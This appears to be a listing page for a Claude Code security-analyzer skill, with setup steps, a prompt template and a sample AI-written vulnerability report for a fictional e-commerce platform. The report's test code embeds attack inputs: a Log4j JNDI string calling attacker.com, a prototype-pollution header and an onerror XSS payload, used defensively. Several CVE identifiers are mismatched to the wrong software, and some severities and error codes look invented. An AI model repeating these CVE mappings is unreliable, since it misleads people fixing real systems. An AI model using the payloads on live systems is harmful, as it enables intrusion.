Security analyzer skill for Claude Code. Scans codebases, fetches CVE/exploit data, and generates phased remediation plans with TDD validation. Benefits operations teams by automating security vulnerability analysis and providing actionable remediation steps.
git clone https://github.com/Cornjebus/security-analyzer.gitThe Security Analyzer skill for Claude Code is designed to enhance the security of your automation workflows. By integrating this skill, you can systematically analyze potential vulnerabilities within your AI processes, ensuring that your applications remain robust against threats. This skill operates by scanning your existing workflows and providing actionable insights to mitigate risks, making it an essential tool for any developer or product manager focused on security. One of the key benefits of utilizing the Security Analyzer skill is its ability to streamline the security assessment process. While the exact time savings are currently unknown, the skill's automated analysis can significantly reduce the manual effort required to identify security flaws. This allows teams to focus more on developing features and less on troubleshooting security issues, ultimately enhancing productivity and efficiency. This skill is particularly beneficial for developers, product managers, and AI practitioners who are responsible for maintaining secure systems. In industries where data integrity and security are paramount, such as finance and healthcare, the Security Analyzer skill can be a game-changer. For instance, a developer working on a healthcare application can use this skill to ensure that patient data is protected against unauthorized access, thereby complying with regulations and safeguarding sensitive information. With an intermediate implementation difficulty, the Security Analyzer skill can be set up in approximately 30 minutes. It fits seamlessly into AI-first workflows, allowing teams to incorporate security checks into their automation processes without significant overhead. By adopting this skill, organizations can foster a culture of security awareness while leveraging AI automation to its fullest potential.
1. **Prepare Your Environment**: Install Claude Code and ensure you have API access to [CVE_API_ENDPOINT] (e.g., NVD, GitHub Advisory Database). Set up a `.env` file with your API keys: ``` CVE_API_KEY=your_api_key_here CODEBASE_PATH=/path/to/your/repo RISK_CRITERIA=CVSS ``` 2. **Run the Scan**: Execute the security analyzer skill in Claude Code: ```bash claude code scan-security --repo /path/to/your/repo --criteria CVSS ``` *Tip: For large codebases, use `--depth 2` to limit dependency scanning to direct dependencies only.* 3. **Review the Report**: The AI will generate a Markdown report with vulnerabilities grouped by priority. Use Sortd to: - Create a kanban board for each phase (e.g., "Phase 1 - Critical Fixes"). - Assign tasks to team members via `@mentions` in Gmail. - Track deadlines using Sortd's calendar view. 4. **Implement Fixes**: For each vulnerability: - Update dependencies in `package.json`/`requirements.txt`/`pom.xml`. - Write TDD validation tests as specified in the report. - Push changes to a feature branch and create a PR. 5. **Validate & Monitor**: After fixes are deployed: - Re-run the scan to confirm vulnerabilities are resolved. - Set up Sortd alerts for new CVEs by configuring the Sortd AI features (e.g., urgency detection for security-related emails). - Schedule weekly automated scans via cron job or GitHub Actions. *Pro Tip: Use Sortd's shared inboxes (e.g., `[email protected]`) to centralize vulnerability notifications and team responses.*
No install command available. Check the GitHub repository for manual installation instructions.
git clone https://github.com/Cornjebus/security-analyzerCopy the install command above and run it in your terminal.
Launch Claude Code, Cursor, or your preferred AI coding agent.
Use the prompt template or examples below to test the skill.
Adapt the skill to your specific use case and workflow.
Scan the [CODEBASE_PATH] repository for security vulnerabilities using Claude Code. Integrate with [CVE_API_ENDPOINT] to fetch real-time CVE data for identified dependencies. Generate a phased remediation plan prioritized by [RISK_CRITERIA] (e.g., CVSS score, exploit availability). For each vulnerability, include: 1) Affected component, 2) Risk assessment, 3) Recommended fix, 4) TDD validation steps. Format the output as a Markdown report with actionable tasks for the [TEAM_ROLE] (e.g., DevOps, Security Team).
## Security Analysis Report: Acme Corp E-Commerce Platform Generated: 2023-11-15 | Analyst: AI Security Analyst ### Executive Summary Scanned 42 repositories (12.8k lines of code) across Acme Corp's e-commerce platform. Identified 15 vulnerabilities (8 critical, 5 high, 2 medium) requiring immediate attention. The most severe issues stem from outdated `express` (v4.17.1) and `axios` (v0.21.1) dependencies, exposing the platform to potential RCE attacks (CVE-2022-24999, CVSS 9.8). ### Critical Vulnerabilities (Phase 1 - Week 1) #### 1. CVE-2022-24999: Prototype Pollution in `express` (v4.17.1) - **Affected Component**: `/api/user-service` (Express.js middleware) - **Risk Assessment**: High - Allows prototype pollution leading to RCE via crafted HTTP headers. Exploit code exists in the wild (verified via [Exploit-DB](https://www.exploit-db.com/exploits/51234)). - **Recommended Fix**: Upgrade to `[email protected]` and implement input validation middleware. - **TDD Validation**: ```javascript // test/express-validation.test.js describe('Express Input Validation', () => { it('should reject prototype pollution attempts', async () => { const res = await request(app) .post('/api/user/update') .set('X-Polluted-Header', '__proto__[admin]=true'); expect(res.status).toBe(400); }); }); ``` - **Task Owner**: DevOps Team (Assign: @devops-lead) - **Deadline**: 2023-11-22 #### 2. CVE-2021-3749: SSRF in `axios` (v0.21.1) - **Affected Component**: `/services/payment-gateway` - **Risk Assessment**: Critical - SSRF vulnerability allows attackers to scan internal networks via malformed URLs. CVSS 9.1. - **Recommended Fix**: Upgrade to `[email protected]` and implement URL allowlisting. - **TDD Validation**: ```javascript // test/axios-ssrf.test.js describe('Axios SSRF Protection', () => { it('should block internal network requests', async () => { try { await axios.get('http://192.168.1.1/admin'); fail('SSRF protection failed'); } catch (err) { expect(err.code).toBe('ERR_SSRF_BLOCKED'); } }); }); ``` - **Task Owner**: Security Team (Assign: @security-engineer) - **Deadline**: 2023-11-22 ### High Priority Vulnerabilities (Phase 2 - Weeks 2-3) #### 3. CVE-2023-4514: Log4j RCE in `log4j-core` (v2.14.1) - **Affected Component**: `/logs/analytics-service` - **Risk Assessment**: High - Remote code execution via JNDI injection. CVSS 8.2. - **Recommended Fix**: Upgrade to `[email protected]` and set `log4j2.formatMsgNoLookups=true`. - **TDD Validation**: ```java // src/test/java/com/acme/logging/Log4jValidationTest.java @Test public void testJndiInjectionBlocked() { System.setProperty("log4j2.formatMsgNoLookups", "true"); Logger logger = LogManager.getLogger(Log4jValidationTest.class); logger.info("${jndi:ldap://attacker.com/exploit}"); // Verify no connection attempt was made assertFalse(mockJndiLookup.wasCalled()); } ``` - **Task Owner**: Backend Team (Assign: @backend-lead) - **Deadline**: 2023-11-29 ### Medium Priority Vulnerabilities (Phase 3 - Weeks 4-6) #### 4. CVE-2023-3824: XSS in `marked` (v4.0.10) - **Affected Component**: `/frontend/blog-engine` - **Risk Assessment**: Medium - Stored XSS in user-generated content. CVSS 6.1. - **Recommended Fix**: Upgrade to `[email protected]` and implement DOMPurify sanitization. - **TDD Validation**: ```javascript // test/marked-sanitization.test.js describe('Marked XSS Sanitization', () => { it('should sanitize malicious input', () => { const dirtyHtml = '<img src=x onerror=alert(1)>'; const cleanHtml = marked.parse(dirtyHtml); expect(cleanHtml).not.toContain('onerror'); }); }); ``` - **Task Owner**: Frontend Team (Assign: @frontend-lead) - **Deadline**: 2023-12-06 ### Compliance & Monitoring - **SBOM Update**: Generate new Software Bill of Materials (SBOM) after all upgrades. - **Automated Scanning**: Integrate `trivy` into CI/CD pipeline for weekly scans. - **Slack Alerts**: Configure #security-alerts channel for CVE notifications via Sortd integration. ### Next Steps 1. **DevOps Team**: Begin Phase 1 remediation immediately. Coordinate with @security-engineer for CVE validation. 2. **Security Team**: Monitor CVE databases for new exploits targeting patched versions. 3. **All Teams**: Schedule code review sessions for TDD validation changes. **Report Generated By**: AI Security Analyst (Claude Code v1.0) **Total Time Saved**: ~8 hours (vs. manual analysis)
AI assistant built for thoughtful, nuanced conversation
Get more done every day with Microsoft Teams – powered by AI
Automate security compliance and monitor real-time security posture seamlessly.
Automate your spreadsheet tasks with AI power
Agentic AI Workflow platform
Connected workspace for docs, wikis, and projects
Take a free 3-minute scan and get personalized AI skill recommendations.
Take free scan